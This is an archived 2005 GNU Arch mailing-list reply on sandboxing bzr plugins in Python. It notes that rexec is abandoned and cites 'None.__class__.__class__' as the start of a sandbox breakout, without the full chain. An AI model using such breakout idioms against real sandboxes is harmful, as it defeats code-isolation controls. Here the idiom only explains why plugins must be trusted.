[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ..
|
From: |
John A Meinel |
|
Subject: |
Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ? |
|
Date: |
Tue, 23 Aug 2005 04:38:08 -0500 |
|
User-agent: |
Mozilla Thunderbird 1.0.6 (Macintosh/20050716) |
Matthieu MOY wrote:
> martin f krafft said:
...
> I don't know how bzr can handle this. If there's support for sandboxing in
> Python, the plugin system of bzr can probably implement this in an elegant
> and secure way.
If you are talking about restricted execution (rexec), last time I read
the code, it was abandoned. As in, still there, but if you actually use
it, it throws an exception.
The problem is that the new style classes give you about 20 ways to
break out of the cage, and nobody stepped up to lock it down farther.
The specific example is this (I think you need at least python2.3):
None.__class__.__class__
This gives you a <type 'type'> object. I forget exactly how you go from
here, but there is basically a way to turn this into just about any
other class.
Anyway, just to say, right now, plugins are trusted code (ie you have to
trust them not to do bad things). This is risky to do as an
archive-manage hook.
The current access controls to a bzr archive are simply filesystem
permissions, so they fall about the same as Arch. Perhaps when the smart
server is implemented, this will be extended to something finer grained
(like monotones allowed keys).
John
=:->
signature.asc
Description: OpenPGP digital signature
- Re: [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, (continued)
- Re: [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, John A Meinel, 2005/08/23
- Re: [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/23
- Re: [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, John A Meinel, 2005/08/23
- Re: [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Aaron Bentley, 2005/08/23
- Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Jan Hudec, 2005/08/22
- [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Matthieu MOY, 2005/08/22
- [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/22
- Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, jblack, 2005/08/22
- [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Matthieu Moy, 2005/08/22
- Re: [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, jblack, 2005/08/22
- Re: [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?,
John A Meinel <=
- [Gnu-arch-users] Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Anand Kumria, 2005/08/22
- [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/22
- Re: [Gnu-arch-users] Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, jblack, 2005/08/23
- [Gnu-arch-users] Re: Re: Re: Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/23
- [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/23
- [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Matthieu Moy, 2005/08/23
- [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/23
- [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, Matthieu Moy, 2005/08/23
- Re: [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, John A Meinel, 2005/08/23
- Re: [Gnu-arch-users] Re: Future of GNU Arch, bazaar and bazaar-ng ... ?, martin f krafft, 2005/08/23